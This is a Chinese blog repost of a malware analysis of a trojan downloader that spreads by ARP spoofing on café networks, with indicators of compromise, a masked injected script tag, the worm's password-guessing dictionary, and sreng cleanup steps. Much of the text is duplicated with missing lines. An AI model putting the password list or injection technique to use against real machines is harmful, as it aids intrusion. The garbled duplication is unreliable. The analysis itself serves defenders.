在U盘里使用PE安装维护
不设置bois也可以从c
Aug
1
关于打开任意网页都会出现832823.cn的加速器控件的解决 
今天突然发现打开任意网页都会出现832823.cn的加速器控件下载。知道是IMG之类病毒,以下给大家转一个文章。希望对大家有帮助,不过我没他们严重,还原没被穿透,就把中毒的机器重新了,全网吧都好了,
在这里给大家一个方法。很快就能查到中毒机器,你的机器上装个anti arp 就可以看见了!下载
www.antiarp.com
最近很多人反映局域网内众多电脑出现打开任何网页就出现加载832823.cn的加速器控件的症状
拿到了病毒样本,分析了一下:
这是一个木马下载器,并可以在局域网内发起arp欺骗攻击,使得中毒用户打开任意网页都会出现安装832823.cn的加速器控件,如图.
其实这个控件是一个abc.cab的压缩包 里面TestSign.exe为病毒主体,并非所谓的网络加速器,TestSign.inf为相应安装信息File: TestSign.exe
Size: 20080 bytes
Modified: 2007年10月23日, 12:01:12
MD5: FA0E442DC0C2E00DD3161F8F8A08B377
SHA1: B2C5A337A50FD6E6A4C7FD8EEA82EC80A5B78F8A
CRC32: B13A3B18病毒运行后,
1.释放如下副本:
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg%systemroot%\system32\drivers\pcibus.sys2.添加注册表启动项目
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加
<%systemroot%\system32\com\comrepl32.exe> 的项目达到开机启动的目的3.启动一个svchost.exe进程,将自身代码注入到该svchost.exe进程中,并通过svchost.exe进程下载http://*/elf_listo.txt到system32\taimpo.txt
并读取里面的内容(里面一般为要下载的病毒文件列表)
之后下载http://*/*1.exe~http://*/*21.exe到C:\并命名为conime.exe~conime0.exe4.感染非系统分区下的htm/.html/.asp/.jsp/.php文件
在其后面添加<script language=javascript src=http://*/abc.js></script>的代码5.试图以下列密码连接局域网内其他用户电脑,并可能发送类似<script language=javascript src=http://*/abc.js></script>的数据包。(但未证实)
901100
mypass123
mypass
admin123
mypc123
mypc
love
pw123
Login
login
owner
home
zxcv
yxcv
qwer
asdf
temp123
temp
test123
test
fuck
fuckyou
root
ator
administrator
patrick
123abc
1234qwer
123123
121212
111111
alpha
2600
2003
2002
enable
godblessyou
ihavenopass
123asd
super
computer
server
123qwe
sybase
abc123
abcd
database
passwd
pass
88888888
11111111
000000
54321
654321
123456789
1234567
qq520
5201314
admin
12345
12345678
mein
letmein
2112
baseball
qwerty
7777
5150
fish
1313
shadow
1111
mustang
pussy
golf
123456
harley
6969
password
1234当局域网中有用户中毒时,会自动执行http://*/abc.js的代码,从而下载http://*/abc.cab文件,宏观表现即为打开任何网页都会出现加载832823.cn的加速器控件的情况上述下载的木马和病毒中几乎都是盗号木马,最后一个为机器狗病毒,该病毒可以突破还原卡并修改userinit.exe文件,使得userinit.exe成为一个新的木马下载者上述病毒木马植入完毕后
中毒机器的sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<%systemroot%\upxdnd.exe> []
<%systemroot%\WinForm.exe> []
<%systemroot%\MsIMMs32.exe> []
<%systemroot%\GenProtect.exe> []
<%systemroot%\cmdbcs.exe> []
<%systemroot%\AVPSrv.exe> []
<%systemroot%\NVDispDrv.exe> []
<%systemroot%\swchost.exe> []
<%systemroot%\system32\drivers\svchost.exe> []
<%systemroot%\Kvsc3.exe> []
<%systemroot%\IGM.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<%systemroot%\system32\com\comrepl32.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []
==================================
正在运行的进程
[PID: 1684][%systemroot%\Explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys] [N/A, ]
[%systemroot%\system32\zhjtrx.dll] [N/A, ]
[%systemroot%\system32\upxdnd.dll] [N/A, ]
[%systemroot%\system32\AVPSrv.dll] [N/A, ]
[%systemroot%\system32\MsIMMs32.dll] [N/A, ]
[%systemroot%\system32\WinForm.dll] [N/A, ]
[%systemroot%\system32\Kvsc3.dll] [N/A, ]
&nb
sp; [%systemroot%\system32\cmdbcs.dll] [N/A, ]
[%systemroot%\system32\NVDispDrv.dll] [N/A, ]
[%systemroot%\system32\GenProtect.dll] [N/A, ]
[%systemroot%\system32\ikewriyriu.dll] [Microsoft Corporation, 5.1.2600.3099]
==================================
Winsock 提供者
MSAPI Tcpip [TCP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)
MSAPI Tcpip [UDP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)......清除办法:
局域网中的用户如果遇到了打开任意网页都出现加载832823.cn的加速器控件的情况,需要查找相应的中毒机器。找到后可以按照如下方法进行杀毒操作。sreng:http://download.kztechs.com/files/sreng2.zip一、清除病毒主程序
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<%systemroot%\system32\com\comrepl32.exe> []2.双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
删除如下文件
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg%systemroot%\system32\drivers\pcibus.sys二、清除病毒下载的木马(由于病毒连接的服务器上的木马几乎天天更新,所以以下方法仅供参考)1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<%systemroot%\upxdnd.exe> []
<%systemroot%\WinForm.exe> []
<%systemroot%\MsIMMs32.exe> []
<%systemroot%\GenProtect.exe> []
<%systemroot%\cmdbcs.exe> []
<%systemroot%\AVPSrv.exe> []
<%systemroot%\NVDispDrv.exe> []
<%systemroot%\swchost.exe> []
<%systemroot%\system32\drivers\svchost.exe> []
<%systemroot%\Kvsc3.exe> []
<%systemroot%\IGM.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []系统修复 高级修复里面 选择重置winsock 重启计算机重启后
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
删除如下文件
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Tao
%Program Files%\Internet Explorer\PLUGINS\NvWin75.Jmp
%systemroot%\system32\drivers\pcibus.sys
%systemroot%\system32\drivers\svchost.exe
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\djatl.dll
%systemroot%\system32\GenProtect.dll
%systemroot%\system32\gjatl.dll
%systemroot%\system32\ikewriyriu.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\MsIMMs32.dll
%systemroot%\system32\msplay32.dll
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\sqmapi32.dll
%systemroot%\system32\upxdnd.dll
%systemroot%\system32\WinForm.dll
%systemroot%\system32\wlatl.dll
%systemroot%\system32\zhjtrx.dll
%systemroot%\system32\zxatl.dll
%systemroot%\AVPSrv.exe
%systemroot%\cmdbcs.exe
%systemroot%\GenProtect.exe
%systemroot%\IGM.exe
%systemroot%\Kvsc3.exe
%systemroot%\MsIMMs32.exe
%systemroot%\NVDispDrv.exe
%systemroot%\swchost.exe
%systemroot%\upxdnd.exe
%systemroot%\WinForm.exe
%systemroot%\system32\sqmapi32.dll2
.建议广大网管屏蔽这个ip地址:60.190.101.206
在这里给大家一个方法。很快就能查到中毒机器,你的机器上装个anti arp 就可以看见了!下载
www.antiarp.com
最近很多人反映局域网内众多电脑出现打开任何网页就出现加载832823.cn的加速器控件的症状
拿到了病毒样本,分析了一下:
这是一个木马下载器,并可以在局域网内发起arp欺骗攻击,使得中毒用户打开任意网页都会出现安装832823.cn的加速器控件,如图.
其实这个控件是一个abc.cab的压缩包 里面TestSign.exe为病毒主体,并非所谓的网络加速器,TestSign.inf为相应安装信息File: TestSign.exe
Size: 20080 bytes
Modified: 2007年10月23日, 12:01:12
MD5: FA0E442DC0C2E00DD3161F8F8A08B377
SHA1: B2C5A337A50FD6E6A4C7FD8EEA82EC80A5B78F8A
CRC32: B13A3B18病毒运行后,
1.释放如下副本:
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg%systemroot%\system32\drivers\pcibus.sys2.添加注册表启动项目
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加
并读取里面的内容(里面一般为要下载的病毒文件列表)
之后下载http://*/*1.exe~http://*/*21.exe到C:\并命名为conime.exe~conime0.exe4.感染非系统分区下的htm/.html/.asp/.jsp/.php文件
在其后面添加<script language=javascript src=http://*/abc.js></script>的代码5.试图以下列密码连接局域网内其他用户电脑,并可能发送类似<script language=javascript src=http://*/abc.js></script>的数据包。(但未证实)
901100
mypass123
mypass
admin123
mypc123
mypc
love
pw123
Login
login
owner
home
zxcv
yxcv
qwer
asdf
temp123
temp
test123
test
fuck
fuckyou
root
ator
administrator
patrick
123abc
1234qwer
123123
121212
111111
alpha
2600
2003
2002
enable
godblessyou
ihavenopass
123asd
super
computer
server
123qwe
sybase
abc123
abcd
database
passwd
pass
88888888
11111111
000000
54321
654321
123456789
1234567
qq520
5201314
admin
12345
12345678
mein
letmein
2112
baseball
qwerty
7777
5150
fish
1313
shadow
1111
mustang
pussy
golf
123456
harley
6969
password
1234当局域网中有用户中毒时,会自动执行http://*/abc.js的代码,从而下载http://*/abc.cab文件,宏观表现即为打开任何网页都会出现加载832823.cn的加速器控件的情况上述下载的木马和病毒中几乎都是盗号木马,最后一个为机器狗病毒,该病毒可以突破还原卡并修改userinit.exe文件,使得userinit.exe成为一个新的木马下载者上述病毒木马植入完毕后
中毒机器的sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []
==================================
正在运行的进程
[PID: 1684][%systemroot%\Explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys] [N/A, ]
[%systemroot%\system32\zhjtrx.dll] [N/A, ]
[%systemroot%\system32\upxdnd.dll] [N/A, ]
[%systemroot%\system32\AVPSrv.dll] [N/A, ]
[%systemroot%\system32\MsIMMs32.dll] [N/A, ]
[%systemroot%\system32\WinForm.dll] [N/A, ]
[%systemroot%\system32\Kvsc3.dll] [N/A, ]
&nb
sp; [%systemroot%\system32\cmdbcs.dll] [N/A, ]
[%systemroot%\system32\NVDispDrv.dll] [N/A, ]
[%systemroot%\system32\GenProtect.dll] [N/A, ]
[%systemroot%\system32\ikewriyriu.dll] [Microsoft Corporation, 5.1.2600.3099]
==================================
Winsock 提供者
MSAPI Tcpip [TCP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)
MSAPI Tcpip [UDP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)......清除办法:
局域网中的用户如果遇到了打开任意网页都出现加载832823.cn的加速器控件的情况,需要查找相应的中毒机器。找到后可以按照如下方法进行杀毒操作。sreng:http://download.kztechs.com/files/sreng2.zip一、清除病毒主程序
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
删除如下文件
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg%systemroot%\system32\drivers\pcibus.sys二、清除病毒下载的木马(由于病毒连接的服务器上的木马几乎天天更新,所以以下方法仅供参考)1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []系统修复 高级修复里面 选择重置winsock 重启计算机重启后
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
删除如下文件
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Tao
%Program Files%\Internet Explorer\PLUGINS\NvWin75.Jmp
%systemroot%\system32\drivers\pcibus.sys
%systemroot%\system32\drivers\svchost.exe
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\djatl.dll
%systemroot%\system32\GenProtect.dll
%systemroot%\system32\gjatl.dll
%systemroot%\system32\ikewriyriu.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\MsIMMs32.dll
%systemroot%\system32\msplay32.dll
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\sqmapi32.dll
%systemroot%\system32\upxdnd.dll
%systemroot%\system32\WinForm.dll
%systemroot%\system32\wlatl.dll
%systemroot%\system32\zhjtrx.dll
%systemroot%\system32\zxatl.dll
%systemroot%\AVPSrv.exe
%systemroot%\cmdbcs.exe
%systemroot%\GenProtect.exe
%systemroot%\IGM.exe
%systemroot%\Kvsc3.exe
%systemroot%\MsIMMs32.exe
%systemroot%\NVDispDrv.exe
%systemroot%\swchost.exe
%systemroot%\upxdnd.exe
%systemroot%\WinForm.exe
%systemroot%\system32\sqmapi32.dll2
.建议广大网管屏蔽这个ip地址:60.190.101.206
rHMQSep3 
2010/05/06 04:17
文章不错!
分页: 1/1 
1 
1
